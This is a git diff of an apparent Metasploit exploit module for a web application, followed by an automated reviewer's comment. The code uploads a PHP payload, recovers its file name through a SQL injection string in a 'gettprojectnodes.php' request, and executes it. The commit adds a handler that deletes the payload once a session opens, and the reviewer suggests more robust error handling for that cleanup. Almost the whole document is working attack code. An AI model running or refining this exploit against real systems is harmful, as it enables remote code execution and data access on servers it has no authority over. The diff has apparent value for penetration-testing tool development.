ranking changed plus on_new_session handler added
parent
468030786f
commit
d6b28dc44d
|
@ -8,7 +8,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm("#{@token}.php")
|
||||
else
|
||||
client.shell_command_token("rm #{@token}.php")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
base = target_uri.path
|
||||
|
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
||||
@token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||
else
|
||||
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
||||
end
|
||||
|
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# attempt to retrieve real file name from the database
|
||||
if token.nil?
|
||||
if @token.nil?
|
||||
print_status("#{@peer} - Retrieving real file name from the database.")
|
||||
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||
begin
|
||||
|
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
||||
@token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||
else
|
||||
print_error("#{@peer} - Could not retrieve file name from the database.")
|
||||
return
|
||||
|
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# retrieve and execute PHP payload
|
||||
print_status("#{@peer} - Executing payload (#{token}.php)")
|
||||
print_status("#{@peer} - Executing payload (#{@token}.php)")
|
||||
begin
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php"
|
||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
|
|
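Review bot: The new `on_new_session` handler (second hunk) removes the uploaded file with no error handling and no message to the operator, so a failed delete leaves `#{@token}.php` on the tested server without anyone noticing. Both branches also pass a bare relative name, which only works if the session's working directory is the upload directory; that is presumably true when the PHP file itself spawned the session, but it is not visible in these hunks. I would wrap the two removals in `begin` / `rescue ::StandardError => e` and report with `print_error("#{@peer} - Could not remove #{@token}.php, remove it manually (#{e.message})")`, plus a `print_status` on success, so a leftover file can be recorded and cleaned up during the engagement. The interpolation into `rm #{@token}.php` is safe only because the regex limits `@token` to `[a-f0-9]+`; a one-line comment saying so would keep a later edit from loosening that pattern.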